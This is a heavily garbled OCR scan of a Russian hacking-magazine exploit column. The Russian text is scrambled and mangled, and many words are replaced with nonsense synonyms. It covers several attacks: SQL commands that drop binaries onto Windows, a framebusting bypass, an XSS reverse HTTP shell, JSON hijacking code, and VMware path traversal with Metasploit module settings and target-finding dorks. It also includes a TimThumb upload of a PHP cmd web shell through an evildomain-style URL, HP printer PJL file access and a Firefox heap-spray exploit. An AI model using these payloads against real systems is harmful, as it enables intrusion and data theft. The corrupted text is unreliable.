UPQATE.writet.e.sJ . S.~T d;~:t;<;~.=..h!WCAT(gg_tБ,!!X.a!l;m!e~.~); ___ _

SELECТ HE X{LOAD_EILE_(~:/tesj:._exe))

INTO DUMPFILE "c:LwindowsL__

[~] ;

__________________

tеmр/ЫаЫаЫа" ;

SELECT data FROM writetest INTO DUMPFILE "C:/windows/T~pLtest.exe" ;

CREATE TABLE readtest(data longtex t );
LOAD DATA INFILE " c:/windows/temp/ЬlaЬlaЬla" INTO TABLE
readtest FIELD ТERMINAТED ВУ "\\" (data);

хранения бинарника. Н а втором шаге на данное луг автор сих строк кладем п ервую

Здесь пишущий сии строки возьми первом шаге создаемтабличку не без; в рассуждении дн им п олем дл автор этих строк
hех-строку.А позже последовательными коман дами ко н катена ции

П оясню . З д есь во п е рво й строке пишущий сии строки читаем настоятельный би н арник равным образом

добавляем осталь ны е hех-строки . На последнем шаге, после ностро селекта,

пихаем его умереть и безграмотный встать проходящий обложка во шестнадцатеричном виде. Это необхо­

скидываем роль полина на ехе " шик-модерн на любом месте ОС. О п исанные мето­

димодля того, дабы nревратить бинарник на « нормальный >> текст. Дальше

дики основаны нате работе Бернандо Д амеле IBiackHat 0009, goo.gl/23808 ).

ОБОЙТИ FRAMEBUSTING-ЭAЩИTY

itJ.•k!t.ii
.л J
однако интересах нас ,

allow-top-navigation на списке разрешений отсутствует, тем

П ару номеров вспять автор этих строк рассказывал относительно XSS-tгack lgoo.gi/1 XmF8) -на­

самым запрещая скриптам в утробе фрейма п ерехо д ить получай др у г ие сайты

грузку чтобы ХSS-уязвимостей. Суть ее во том, почто симпатия д обавля ет н а

основным окном. То глотать со фрейма клиент уж никуда н е ден ет ся .

уяз ви мую страницу структура размером изумительный ве сь экра н , на котором за­

У данной технологии обхода fгameb u sti n g-зaщиты нашел ть единодержавно

гружается другая ступень сего а домена . П ользователь nри зто м

случайный минус: поддерживается сия новая НТМL5-фича всего-навсего п о­

видит нормальную страницу сайта, однако совершенно его поведение отслежива­

отпечаток н ими браузерам и, истинно равным образом так отнюдь не всеми. Туту ж после д умае шь ся, н аско ль ко

ются ХSS-трекером: все, который возьми ходится в середке фрейма, досту пн относительно с

прекрасно располагать самый пр одви н утый браузер.

JavaScгipt, а за вычетом того, многие поступки дозволяется равно эмулировать .

Вкачествеэкспериментальногоибраузерозависимоговарианта

Кросс -доменные политики здесь неграмотный действуют, где-то в духе абонент н е

дозволено потребовать идеюобхода вслед счетвстрое нн ой на IE8/9 защиты oтXSS.

покида е т д оме сверху .

Фича во том, чтоб п ереходить нате страни цы из fгame bu sting"oм, добав ляя

Впрочем, оттаких фреймовых нагрузокдавно сейчас принимать следовать суп та. В

во адре вместе с возле переходе простейшиеJаvаSсiрt " ы IXSS). Фильтр IE, « увидев >>

простей ш ем виде симпатия пр едставляетсобой короткий JavaScгipt:

отраженную XSS"кy, автоматом отключаетяваскри птн а ст р ани ц е !той, что-то

<script type="text/javascript" >
i f(top !=self) top.location. replace ( location);

латации нам нужны п очтидвеХSS-дырки. Од н а дл автор этих строк того, воеже подгру­

0-.Lscгi.pj: ~-----··---··- ___ ...... ···-··-···

опередить IЕ-фил ьтр) , равным образом вторая-для подс танов ки нет слов фрейме да шаг ивации

среди фрейма) , да fгam ebuste гн e ак тив да р американский рубль тся. Таким образом, на зкспу­
зи ть ваш покорный слуга васкрипте фреймом lstoгed XSS тож гeflected, разве твоя милость з н ае шь, в духе
фильтра во IE. Согласе н , почто хитро, же наравне задумка зтодовольно интересно.
Д анный скриптразмещают получи страни ц ахти защищаемого сайта . Он
пров е р яет, ради гр ужен ли во фрейме, равным образом п ерезагружает страни цу на не без; л учае

обнаружения сие г по отношению факта. Но да з десь пишущий сии строки кой-что можем свершить . Вотан
изо из п особов, пр авда , далеко не бог гуманный-обрезать потенциал
яваск риптавофрейме. Д елаетсязтозасчетиспользова ни автор марево аметра

sandbox, тот или другой появился во HTML5 равно ранее п одд ерживается браузерами.
<i f rame s rc..:;lhttp: 0Lwww. v ictim. comtia nd box="allow-same-origin
allow-forms allow- scripts" ></ifra me >

--

.. ____с__ о~.....~~

C G>

..

.

•· nn- ·~- ..-..~-

__

C Q "or

-~~ ~

~

~

-- ~~---......;._

:.::::,::

:· ~ ~· -.1-=rt~

З д есь я <<разжали >> нашу песочницу, позволяя пр овод ить боль­

· .,..."
~
,,

шинстводействий в середке фрейма на ш та тн ом режиме. Е сли автор сих строк уберем
allow-scгipts, т ояваск рип твоя милость во н утри фрейма безграмотный вслед п устятся. Но что такое? на аж-

ХАКЕР

00 / 053/ 0011

Включаем песочницу-отключаем автор васкрипт изумительный фрейме

01,3

ВЭЛОМ/ЕАSУНАСК

ВЫЖАТЬ МАКСИМУМ ИЗ XSS

Ш•l·i!t.~1
т

Я хо ч у маленько сообщить что до

Shell of the

Futuгe. К сожа л ению,

GЕТ

g

http://WNw-SOOIIe.com

зто всего делов лишь только экспериментальная разработка, этак что такое? нонче кратко.
В

т

Shtoll of the Future

Send the tt!Qutst to the Shtl

о~ь-~

HTML5 появляется та кая вещь, что COR- Cгoss-oгigin гequests.

С их через браузеры смогут отправлять кросс-доменные вызовы

-~~g
0

равно приобретать ответы, йес ли сервер зто разрешит. В итоге дозволительно хорэ
d>eGooglt homo .....
to Ptntкt«" s ЬfO\VS«

-

туннелировать НТТР-трафик. П относительно идее сие выглядит так:

0.

т

Ьody tolhepcoxy

Жертва переходит в области ссылке из

XSS.
0. XSS подгружает нагрузку - шел л IShell ofthe Futuгel .
0. Мы разрешаем получай своем сервере nрием таких СОR " ов.
0. Ш елл отс леживает поступки пользователя равно отправляет их СОR "ами.
0. В СОR-ответы автор сих строк кладем необходимые для того выполнения коман ды.
0. Н аш ш ел л читаетответы COR да выполняет необходимые действия.

------------------л
------"1
_________;

s.nd the fflPOf\Sf Ьоdу to т.
SМtlof thtfu turtwtЬstfVtr

Stndthe requestto
!Мvictim"JЬrowset"

Д об пятого пункта всегда ра ботает напрямую сейча из . По сути основная

фича -это мочь обработки ответов JavaScгipt"oм. В итоге ты да я
получаем реверсавый httр-шелл .
Технологии движутся. Что само е со трашное- дозволено пресмыкаться за
атакуемомусайтуот имени нашей жертвы на своем спринклер ре. Но тогда

у но безграмотный помогут ни framebusting, ни оплот для у кисов флагами HttpOnly/
Secuгe. Автор сего чуда -Лав акумар Kynnaн . Если занятно углу­

бабахать из ваш покорнейший слуга , разобрать тонкости равно попрактиковать от автор - www.and l abs . oгg/

tools/sotf/sotf.htm l.

Shell ofthe Future: официальная карта

УКРАСТЬ КОНФИДЕНЦИАЛЬНУЮ ИНФОРМАЦИЮ

Ш•fAit."i
·хът

___________________________________

}.;
В данной задачке аз многогрешный хо ч у растрепать что до такого склада вещи, во вкусе

JSON

<L5cri R.Q__

Hijacking . И х отя не откладывая каста квалификация малограмотный со лишком актуальна, ми
Теперь паркет у будущий от се рвера конгломерат JSON хорэ обрабатыва ть ся

бог захотелось растрепать что до ней, таково в духе возлюбленная использует баста

интересныеинеста ндартные подх оды. Итак, напомню :

JSON - зто

текстовый параметры обме в данны ми, основанный сверху JavaScгipt равно
используемый без дальних разговоров на основном вдjах-приложениях.

на правах связка , возвращающая значени е . Для извлечения значений nо­
надо нижеупомянутый из криnт.

JSON Hijacking

-п в отношении сути , сие категория CSRF ICгoss-site г equest foгgeryl, вот всяком
случае основан получай н ем.

Пр е дп оложим, у нате со вкушать сервер, каковой возле отсылке держи http://

LLдeлae_11__G ET -заа.рос_и__Dолучаем

JSON
<5c ript 0rc="http: / / 0erver/ 0ecret-info _j5on"
type="tex t / javascript" ></script >

seгveг/sec гet -inf o .json GET-зanpoca изучает наши куки lнапримерl, равным образом
буде касательно ни имеют определе нно е зна ч ение, возвращает конфиденциаль­

Lfl!ынимаем_д.анные изо функции (бывшего массива),_ _ _ _ __

ную информацию:

<scri~iQe=" te x t Lj avas c ri ~t~·~
· >~-------------

[ "аааа",

var yourData=" " ;
var i=-1;
while (secrets[++i] ) {
yourData +=5ecret5[i] + " ";

" pa55word " ] _ _

Такая положение равным образом называется СSRF-ведь сервер малограмотный проверяет ни­
чего, в дополнение наличия кукисов, да автор сих строк можем подделать запрос, например,

разместив возьми какой угодно страни ц е винтернете не без; ледующий шифр :
$_~.с r

i pt 0r с=h t t р :L/ 0е r_v_eJ"L5 е c_ce1:_info~j s оn >_ _ _ _

}
а le d(-"2"кtblдe!io_:__"_±_iQYI:Rat а);

</5c ript >
Пр иобработкетакойс траницы браузеротправитза пр оснасервер
да п олучитсекретные JSОN-данные. Н в рассуждении во беда-это а никак не ко д
JavaScгipt, а скопление

В ито ге отсюда следует следующая ситуация. Мы создали специальную

JSON, да браузер, п онятное дескать ло, отнюдь не сможетего

страницу, которую можем расположить идеже приятно на интернете. Жертва

да от толстить . Как но нам п олучить из сего места данны е? Решениележит на

вслед х одит нате нашу стра ни цу, да возле условии, сколько симпатия аутентифицирована

том, с намерением переопределить на JavaScгipt концепция ма от сива на функцию

бери уязвимом сервисе, автор получим конфиденциальные показатели со зто го

следующим образом:

сервера . В качестве примера м что до жно вспомнитьзнаменитый ба г на
тот или другой ужас до чего нашумел на

Gmai l,
0006 году : между тем не возбраняется было обретать

<5cript type="tex t / java5cript">
var 0ecrets;
Ar ray_::_functioa.()_{ _ _ _ _ _ _ _ _ __

уровне браузеров запре щ ена достижимость переопределения Аггау.

~e_~re ts_=

Хочешь проверить, аюшки? ба г работает,- ищи браузер времен Fiгefo x

thi5_;_ _

сnисок контактов пользователя равно заглядывать его почту.

К счастью иначе ко сожалению, сейчасданный рецепт н е работает: бери

ХАКЕР

0.0.

00 / 053/2011

EASYHACK

ПОЛОМАТЬВИРТУАЛКИПОДVМWАRЕ

......м
--

т

общественный порядок старуха !nримерно 0009 года, ЕSХдо версии 0.51, так отличная
Виртуализация, виртуализация, виртуализация- немедленно сим сейчас

безделушка про баловства сие б безусловно

ни души далеко не удивить. Со всей своей бородатостью , виртуализация

травереал директоринахостовой машине:

CVE-2009-3733 . Суть- минимальный

безотлагательно по полной обойме проникает равно усnешно замещает существующие

инфраструктуры во различных компаниях. Оно равно понятно: убирать

htt~/victim.com/sdk/%2E%2E/%2E%2E/%2E%2EL%2Eblfl%2E ~2E/%2E

много плюсов- большое часть возможностей, глубокая

%2E/etc/passwd

гибкость, централизованное руководство , убывание финансовых
затрат. И упомянутая борода- как бы уверенность того, что-нибудь превалирующая
возможных проблем сейчас были кем-то решены.
Впрочем, очищать равно трудности. Думаю, во всем понятно, что-то разве взлом­

щикуудастся изменить до неузнаваемости хостовую ОС, ведь считай, зачем равным образом совершенно лежащие получи

ней гостевые системы в свою очередь ранее его. Одн"ако были равным образом упражнения ба го во ,

Что сие д ает нам? Захватить ревизия надо хостовой ОС автор безграмотный

можем, только видишь со шатать целое гостевушки -л егко . Для сего читаем /etc/

vmwaгe/hostd/vmlnventoгy.xml да от учетом сих данных определяем
путидоvmх"ов.
Из новенького зараз дозволительно вспомнитьдругой градиент атаки,

рядом которых специфический сплоит был в силах << сбегать» с гостевой ОС во

вперенный в vCenteг- систему централизованного управления

хостовую. Это реальная жесть: есть смысл внести изменения одну машинку- равным образом от чи­

большим численностью виртуало к. В wеЬ-сервере

тай, твоя милость поимел всю вентерь . Пример подобноготакого сплоита ваш покорнейший слуга видел

сутствуеттраверсал:

только лишь один: автором бы11 один человек изо

lmmunity,

jetty по 0.1.1 0 при­

а чувствительность была во

btt.P-s.дvictim.шm/yciLP_g_ll!o:J&ads.L!Jйll!l.xml/%ЗF:f, ,/.~/ .. L•...J~L· .__

видеодрайверах.

Но зто настоящий хардкор.Чтоже я можем проделать получи и распишись nрак­

/ .. / .. / .. /any _Ые

тике? Все грубо ведь а самое, только лишь неизмеримо проще. Давай
вспомним , из почему всегда начинается. Конечно, вместе с обнаружения целей,
вместе с фингерпринта.Итак, наши цели сие vSpheгe,

ESX, ESXi, vCenteг,

Через данный ба г не возбраняется по головке безграмотный погладить до самого файлов из секретными иден­

тификаторами клиентов lvpxd-pгofileг-*1, которые играют цена

Sегvег. Простейшие гуглодорки:

своеобразных кукисов чтобы общения клиента vCenteг из сервером .

io_1;,itle: "Welcome to Vmware ESX"
i~title: "VMware Management Interface:" inurl: "vmware/ en/ "

session _ гideг. гb, входящего на комплектVАSТО. Последовательность

Исnользуются сии идентификаторы не без; через модуля vmwaгe_

Д алее порте ка н: позволено обратить внимание портки 002/903, ответственные ради
удаленное отвод ко хостовой ОС vmwаге-клиентом равно стандарт­

0. Через травереал получаем идентификатор.
0. BMSF:

ный укомплектование портов

сnисок -

http не без; веб-сервером << vmwaгe httpd ». Более толковый
goo.g 0/NdMfy.

действий такова:

Что дальше? Хотя портскан равным образом показывает нам версию хостовой
машины, сие адски приблизительная информация. VMwaгe позволяет

-~u.uxiliar_yjva_sto/VIII!"!.<Jre_session_r_:LQ.e_c__.....____..___

set RHOSTvictim.com
set SOAPID 04D40C81-564E-4511-AC0D-D57FFA571E~

нам выведать точную версию вплоть впредь до заезжий двор билда. Для данной цели

моя особа накрапал скрипт в целях nmap"a. По своей сути, ни ложки экстраорди­

(это идентификатор)

run

нарного: держи 043-й пристань отправляется намеренно сформированный

SOAP-зanpoc, каковой равно nредоставляетнам необходимые данные.
Теперь, нет-нет да и наша сестра безошибочно знаем, который выше- соперник , - переходим

0. В vCenteг клиенте IVI clientl указываем хост: 027.0.0.1:9999.
0. Осуществляем подключение.

во наступление. В общем-то , на этом месте главное- << nродукт >>
Это коллекция модулей для

VASTO.
Metasploit Fгamewoгk через итальянских хакеров

После этого, неравно идентификатор уже жив, произойдет под­

Клаудио Крисционе равно П аоло Каналетти, которые были представле­

ключение для vCenteг"y, присутствие этом усилие на самом клиенте деньги от­

ны получи BlackHat 001 О l vasto . nibЫesec.oгg ). Набор позволяет произ­

личаться далеко не будет. Так равно как идентификатор имеет вдоволь короткое

водить целостный рядатак получи разнообразные системы виртуализации.

миг жизни !порядка 0 минут затем выхода с системы), в таком случае во VASTO

Мы будущее покажет небольшую толику с них. <<Установка >> модулей проста впредь до

прил агается автоматизирующий безвыездно манипуляции файл- vmwaгe_

безвыгодный потенциал : разархивируем папку да кидаем совершенно файлики во

autopwn.гb. Есть да до сей времени малость модулей поддругие nродукты на правах

%msfгamewoгk %\msf3\modules\auxiliaгy\vasto ly некоторых мо­

VMwaгe, эдак да других разработчиков, а сие оставим нате самосто­

дулей принимать настрого приписанные пути). Далее, разве взламываемая

ятельное изучение.

Классический портскан ESX"

Определяем точную версию продуктов VMware

ХАКЕР

00 / 053/ 0011

iv 0ivin side. Ь logspot.coml
pikofarad 0115612, дескать р . Кра не без; ная з во ездочка, д .1 0

ВЭЛОМ/ОБЗОРЭКСПЛОИТОВ

Обзор
эксплоитов
Сегодня ты да я по мнению кажем тебе, по образу много враже­

0

Удаленное выnолнение стих

во WordPress"e TimThumb

~5

CVSSV2

0111 011 01 011 01 01 0111 011

011 01 01

IAV: N/АС : L/AU: N/C: Р/1: Р/А: Pl

ский благ держи WoгdPгess"e, как бы приобрести сила

~

надлазерными принтерами НР, на правах натянуть

да nр е дс тавляет из себя скри nт-у тилиту timthumb.php, которая за­

сносно никак не подозревающих пользователей

Fiгefox"a, а да приведем очередное под­

тверждение тому, сколько на сих ваших линуксах [с]
также естьдырявый софт.

Пл аги н

TinThumb равно сnо льзует ся многими темами во движке WoгdPгess

нима е т ся масштабировани е м равно зо браж е ний . Гу гл nоказываетоколо
00млнупоми н анийзтогоскриnта,чтоnозволяет н азватьеговесьма

nоn улярным. В начале августа вводные положения от ь вал взломов, связанных
сзтимскриnтом,дажеблогразработчиказтойутилитыбылусnешно
ха плетка со п омо щью баги! Уязв имость существует равно з- ради того, зачем со кр иnт

в области з воляет находить применение равно исnолнять РНР-к относительно д во nап ке от ке шем . Итак , раз­
беремся, ась? а туточки прои схо дит.

lj3Ц!•Iii
Начнем вместе с того, чтозакешироватьфайл допускается из помощьютакого запроса:

http :/Lwww.targe.:!:_.j:ld/wp-content/themes/THEMELtimthumb. _ _
Rhr:>?src=htt g :LLЫ_ogger. сот. evildoma i n,tldLg ocfile_.J1.hP _ _ __

ХАКЕР

00 /153/2011

Об зо р экс плоитов

~ ~tmthumb php (PNG 01llede . 000х100 plxeis) ;~ Mozllla f1rcfox

Заnускаем арифмометр от б агу на timthumb.php

Слово «ТНЕМЕ » годится подменять для наз ван ие темы, ну-кась да приблизительно далее.
Разумеется, отнюдь не всётак просто. Во-первых, ке шир в отношении во ать файлы раз­

~х7б l_хб~х бС ~х 0.8 ~х 0.4~х 0F \х47 ~х45\ х 04\х 0В~х 0.7 ~х бЗ ~@_ _ __

.

\)<64~~;?.Z";х~~х 0.9 ~~х 0.е~хЗF~ХЭ_Е;~х ее

решается никак не вместе с любых доменов, а всего-навсего из доверенных. П в отношении умолчанию
инвентарь этихдо~енов представлен таким массивом:

Этапростынянасамомделепредставляетизсебяпростейшую

G IF- картинкус дописанным на кон це бонусом во виде <?php raeval[$_

$allowed5ites ; array (
_:_flickr.com" ,,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

G EТ[ "cmd"JI ?>. П ос л е ска р м лив ания н аше г об файла cкp ипт yti m t humb .p hp

__:_picasa .com" .

и, ась? самое главное, безболе з ненно вслед за п усишко тить е го оттуда. До полни те ль­

ное описа ни е позволено жениться отсель : www.exploit-db.com/exploits/17602 .

" Ыogger.com" ,

" wordpress.com" ,
" img .youtube.com" ,
" upload .wikimedia .org" ,
" photQpucket . corn_" ,

----------------------·

);_

его мож н касательно будетобнаружи т ь во папке /wp-content/themes/THEME/cache/

if.)ьld:Jti
WordPress TimThumb Plugin 0.• -1. 02

,_i,J!Iii[•J:I
Су щ ествует изрядно рекомендаций п об п ово д у решения этой пр в отношении ­

Фей л после этого состоит на том, почто доказательство проверяется функцией stгpos

блемы . Во-первых, обновление: во версии

0.34 nр об ле ма уж решена.

таким об р азом, что такое? сделал ли где-либо буд ет на со тречаться такая п одстрока,

Во-вторы х , можноту п об уничтожить э т через от кри пт, убе дивши сь присутствие этом, что такое?

так

безнегоблогработаетнормально . В-третьих, р екомен дуютудалить

URL пройдет проверку,

почто да было продемон со трировано во вышеобо­

значенном ради пр осе. Е вместе с ли безделье замо р ачиваться со п по части дд оменам равно , т что касается

всё-таки строки с массива со д оверенными д оменами, так принимать заслонить

не грех без затей задействовать папку со именем ра з реш енного домена .

ранее упоми навшийся скопление для

Вторая хреномать помогите т оит во том, сколько автор сих строк д олжны отдать п онять скри пт у,
в чем дело? возлюбленный имеет д ело со изображением, а невыгодный от каким-тотам РНР-кодом. Это
достигается тем, ась? на зачин нашего файла наш брат побайтово вставляем

$allowed5ites ; array (); . Таким об­

вместе , не без; кри пт сможет корпеть всего не без; локальными файлами, почему во
больши н ствеслучаев вплоть до не без; таточно.

Кроме т ого, нашел ли твоя милость являешься вла д зеленая красавица ц ем б л а г а н а WordPгess "e,

какую- ни до скорого свидания картинку, с намерением возлюбленная немного погодя ви се ла п в отношении во всех отношениях правилам фай ­

ведь никак не помешает nроверить, никак не поимели ли теб ваш покорнейший слуга вместе с п омощью этой ба г и:

лового фасон т а. Поле зно полноте ознакомиться ан фу-ты п в рассуждении ссылке http://goo.g i/
We45j. со временем обсуждае т ся соз д ание миниатюрного GIF-файла размером
во 05 бай т. Итак, копируем сии 05 байт во файл, а со временем ни х [!l размещаем

0. Залоги н ься возьми сер во ер чер ез SS H.
0. Перейди вдиректориюсWогd Рг еss.
0. Выполни коман ду << grep -г base64 _decode •,,, Если на рез ультат ахти

прои з невозбранный РНР-код- близ ем, во общем-то, извес т ный да ис п оль­

зуется ахти часто. В качестве РоС автором эксплоита приведен
вместе с л е д ую суп й вариант:

выдачи прис у тствуют длинные закодированные строки, то, воз­

можно, тебя п оимели.

0. Также надлежит пров ери тьд иректорию/tmр получи реальность подозри­
тельны х файлов со расширениями txt сиречь php .

\~47\х49\х4б~х3 0 \ХЭ9\хб1\хе 0~х ее\ х еl~х ее~х8е\х ее \х ее

\xF F \x FF\xFF~xee~x ee~~x2.1~xe4\xel~x ee~~""xe..,.e"-----­
~~XК"l~x!!!!lx ee~ee~e~~.!!.1~el~x ee\ x e 0.\xe2.
\x44~xel \хее\хЗ В ~\хЗ С ~х ЗF ~х б8~х7е \х2.е\х4е\,..._,хб.,.Sс___

0

Множественные уязвимости на принтерах

НР LaserJet Рхххх Series
~8

CVSSV 0

0111 0111 0111 01 0111 0111

01 011 01

[AV: N/АС: L/Au :N/C :С/ 0 :N/А: N1

Шiim

Кто бы был в состоянии п что касается д усталость ь: на помогите т аве

Meta sploi t Fram ewo гk "a организованно

начинают проступать экс пл оиты подапnаратное обес печ ение разного

рода . На данный единожды зат р что до н ут ы бы ли принтеры La se r Jet фирмы HewlettPackard. Кажется, близок оный с утра до ночи , ко гд а буд ут nоявляться экс пл в рассуждении да ­
твоя милость перед микрово л однако вки равно со тиральны е машины. Сегодня а п что до д подзатыльник по­
пали те принтеры, идеже дано случай у п равления п об Сети посредством

каждому свой язычина PJL [Printer Job Langu agel. Путем формирования
от п ециаль ны х запросов ко близ нтеру ч ерез ста нд арт ны й JetDirect-пopт

0100 дозволено nолучитьдоступ ко файловой сис тем е принтера, а тоже
уполномочивать пр оизвольные коман ды получи и распишись языке РJL.

IJIQ!•Jii
Д ва модуля около принтеры доступны на составе
Выnолнение nолезной нагрузки во Fiгefox 0.6.16

ХАКЕР

00/153/2011

MSF п об д именами hp_

priп ter_pjl _t raversal да hp_ priпter_pjl _c md . Пе рвый их ни х п озво ляет

ВЭЛОМ/ОБЗОРЭКСПЛОИТОВ

tст~адреса

tст~адреса
ДО Ох 0fffffff

0

: Другие структуры
0

ГlоnаДаем семо

Ox3c0dff7d

0

------------------.1
0

ДО ОХ 0fflfflf

------------------,
0

0

: Другие структуры :

0
0

0

Попадаем семо

....

Ox3c0dff7d

внедреНная гора

...

ВНедреNiая ворох

~

} nop + shelcode

ВНедреNiая кипа
0недрежая навал

Ох06ЮОООО

0

0

~------------------•

~------------------1

М11аДu.ие адреса

+до ОхОООООООО

0

: Другие структуры :

: Другие структуры :

0

Куча

Ox06IOOOOO

Куча
0

До Т"f)ИМеНеН4Я техi-ИО4

адреса
+Млaдi!JIIe
ДО ОХОООООООО

heap sprayhg

0

Схемати ч еское слепок метода heap spraying

получитьдоступ ко файловой сис т еме принтера. Опции эксплоита безвыгодный

может оказываться освобожден от рецепт OnChanneiRediгect, принадле­

отличаются оригинальностью:

жа щий интерфейсу

nsiChanneiEventSink, во р езультат е став ви ся щим

указа телем . Впоследствии спирт может оказываться изо дня в день использован,

в некоторых случаях буд ет прои испражниться блок атрибутов д анных на ОВJЕСТ"а.

RHOST -тарг е тный адрес.
RPATH- конец во удаленной файловой системе.
RPORT -таргетный порт.

Оnисываемый модульдля metasploit"a использует во вместе с воей реали за­
ции технику heap sргау вместе с RОР-цепочкой с целью обхода механ изма

DEP держи

Windows ХР SРЗ.
Читать файлы позволено командой « !г FILE» во интерактивном режиме,

п е ре хо дить во корневую дире который рию неподвижность ндой «/», а командой<< .. » -

IJЗQ!•Jii

получи и распишись одинокий точка вв е р х в соответствии с файловой системе. П касательно ее структуре, кстати,

Использование дотоле освобожденной памяти может прив ести для раз­

дозволено заметить, сколько держи принтерах нужно некая юникс-подобная ОС

личного рода неблаг а приятным в соответствии с сле дствиям, начиная ото искажения

[типа LynxOS), а когда зацитировать обложка /etc/passwd, дозволяется обнаружить,

используемыхданныхдоисполненияпроизвольногокода.Впро­

почто во качестве командной оболочки фигурирует /Ьin/dlsh .

стейшем случае профанирование данных может прив ести ко повторному ис­

пользованию освобожденной сис т емы памяти . Ошибки use-afteг-fгee

Второй устройство MSF позволяетот сы л а ть пр оиэво льны е РJLкоманды печатающее устройство у. Помимо еще привычны х опций RHOST да RPORT,

имеют двум общих равным образом по временам пер есекающихся причины:

поглощать ва ж ный параметр СМ О- по сути дела команда, по отношению тсы л аемая

печатающее устройство у. В нашем прим ере фигурирует неподвижность нда чтения файла /etc/
passwd , хот моя особа в самом деле их перед ста как следует много, быть желании дозволительно
осведомиться от мануалом для этомуязыку согласно ссылке http:Ugoo.gi/UKesp .

""·"tld:tfi

НР LaseгJet Рхххх Seгies, возможно, всё-таки принтеры La seгJet со поддержкойуправленияпоСети.

На сей мгновение р ешения проблемы малограмотный обнаружено .

0

Firefox 0.6.16 OBJECT mChannel Remote Code
Execution Exploit (DEP bypass)

CVSSV2

01111 0111 011 011 01 0111

00.0

01 01 01
[AV:N/AC:L/Au:N/C:C/1:(/A:C)

0ШJШ

Дата релиза: 0 августа 0011 возраст , творец : RhO, CVE : CV E-201 0-0065.
Уя звимость use-afteг-fгee во Mozilla Fiгefox 0.6.16, дающ ая умереть и неграмотный встать змож ­
ность атак ую щему воплотить в жизнь проиэвольный адрес на контексте пользо ­

вателя, запустившего браузер, была обнаружена гegenгecht"oм, а в рассуждении пи­
сываемый тогда модульдля metasploit "a создан RhO. Суть уяз вимо со ти

заключается на том, который mChannel, являющийся элементом OBJECT"a,
Вотан с поnулярных nринтеров НР, nод на ерженных уязвимости

ХАКЕР

00/153/20 01

Обзор эксплоитов

---~~~
.~~
..7
., ------~~=-~--~~~~·-~~==~~~~~
Fi~

Edtt

View

О Е
Тhumbn&Us .

~.,

[]

)(

Go

~

(93of309)
S.ЗО

Fit P.aoewidth :

Envtronment Commutds

Example: Senlng the
Prlnter to а Deslred
State

01

НР

Thefai(1N!ngexampledemoostratesS<"tting
Lase-J et 0
and 0М printe-s to а kna.vn state. F а- the spEdfic pri nter
yw аге ctnfi9Jring. cmsider which environment features
yOJ сопение moclify. The mOOifiableenvircnment features faHP Las<rJ et 0 and 0М printers arelisted Ьеlа,у (see
AppendixA f<ra llstderwiroomentvariaЬiessuppated~
each PJ L printer):
COPIES

FORMLINES

PAPER

MANUALFEEO

---ORIENTAТION

[(

a..-

RET

PAGEPROTECТ

PERSONALIТY

RESOLUTION

TIMEOUT*

FONTSOURCE

PТSIZE

FONTNUMBER

SYMSET

РIТСН

PRTPSERRS

*

--

• PERSONALrfY and TIМEOUT do not alect the pМtod oulp.М and gener·
altyahouldoo!Ьeused.

Ofthese НР Laserj et 0and4M f""tures, a>lyRET,
РАGЕРRОТЕСТ, and RESOLUTION affe:ttheprinted
autput and cannoc Ье !И using the prlntw language (in this
В ма н уа л е п касательно языку PJL 009 страниц - этотебе отнюдь не WEP ломать!

Прыгаем получай полезную нагрузку

ошибки равно кое-кто исключительные обстоятельства;

base/src/пsObjectloadiпgCoпteпt.hl равно во результате за цикла сборки

ералаш на вопросе об том, какая дробь программы отвечает вслед за осво­

мусора превращается на виснущий обозначение .

Висящаяссылка можетбыть использованапутемустановки

бождениеданных .

атрибута
В этом случае память, по отношению которой по рукам речь, удобно выделяет-

data нашему э лем енту ОВJЕСТ. Это приведет ко ваш брат зо ву метода
LoadObject да следовать грузке OBJECT"a.

ся др угомууказа те лю на какой-то минута сообразно сле того, во вкусе симпатия была
освобождена. Первонач а льный словарь получи и распишись освобожденную воспоминания

nsObjectloading~ontent:: LoadObject(nsiURI *

области памяти . Изменение данны х привед ет ко искажению действи­

aURI,
PRBool aNotif"y,,________________________ _
const nsCString& aTygeHint,,_______________

тельно используемой памяти, который может обусловить ко непредсказуемому

PRBool aForceLoad)

используется по новой равно указывает получи и распишись какой-то ячейка во новой выделенной

поведению пр оцесса.

Доп устим, в чем дело? получится так, в чем дело? опять-таки выделяемые материал будут
хранить класс, как например в(++, быть этом небо и земля указатели

if (mChannel) {

функций могут состоять разбросаны сообразно данным кучи . Если безраздельно с сих

указателей функций пер еза пишется адресом ш еллко да, так может

mCha nnel- >Са n се l (N.S_BINDING _ABOFП.ED);

фигурировать перед стигнуто воплощение произвольнаго кода.

Выдержка с coпteпt/base/sгc/пsObjectloadiпgCoпteпt . cpp:
пsObjectLoadingContent : :OnChannelRedirect(
~ Channel

*a OldChann_el,_ _ __

nsiChannel *aNe~w~C~h~a~
пп~e~l~·L------------------_ I"RUint32 aFlags)_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

{

01 If we"re already busy with

а

new load, cancel the redirect

if (aOldChannel !=mChannel) {
return NS_BINDING_ABORTED;

В модуле

metasploit, реализующем данную уязвимость, применя ­
heap spгayiпg, которую наш брат без дальних разговоров сокращенно оnишем пользу кого
дальнейшего понимания дела. Те хнику heap spгaying дозволяется nрим е­
ется аппаратура

нить, при случае программа, содержащая уязвимость, обращается в области не­
существующемуучастку nамяти, находящемуся во адресном простран­

стве кучи. При этом местоположение безграмотный низменность жен бытийствовать ранее

Ox7fffffff,

nоскольку

далееследуетадресноеnространствоядра,ккоторомуприложениеиз

гingЗ безграмотный имеет доступа.

__if (mClassifier)_ { _____·--·--------··--····-····-·-·----mClassifier -> OпRedirect(aOldChannel, aNewChannel);

Ключевым моментом на исnользования heap spгayiпg является
возможностьуправлениякучей,иначеговоря,возможностьдобав­
лять данны е на кучу, выделяя около ни х п амя ть , давно тех пор ноне неисполь­

зуемый д что касается сего момента местожительство на памяти проце ссаненачнет существо­
mChanпel=

_ r eturn
}_

aNewChannel;

NS_QК;

вать. Д обавлять документация на кучу ты да я будем блоками, притом и оный и другой изо
блоков хорэ владеть сле дую щий вид: nор-цепочка+ shellcode . Данные
телодвижения совершаются потому, почто операцио нная учение самоё

распределяетадресное пространстводля выделениядинамической

Существует вероятность вызова метода OпChaппeiRediгect, уста­

памяти, соответствен н о, хоть имея получи и распишись рукахточный адрес, сообразно кото­

навливающего прагматично невозбранимый вещь на качестве канала

рому бросьте подаваться господство на результате исполнения уяз­

в целях использования, от случая к случаю злемент OBJECT !реализация интерфейса

вимого кода, автор невыгодный сможем определённо утверждать, сверху какую инструкцию

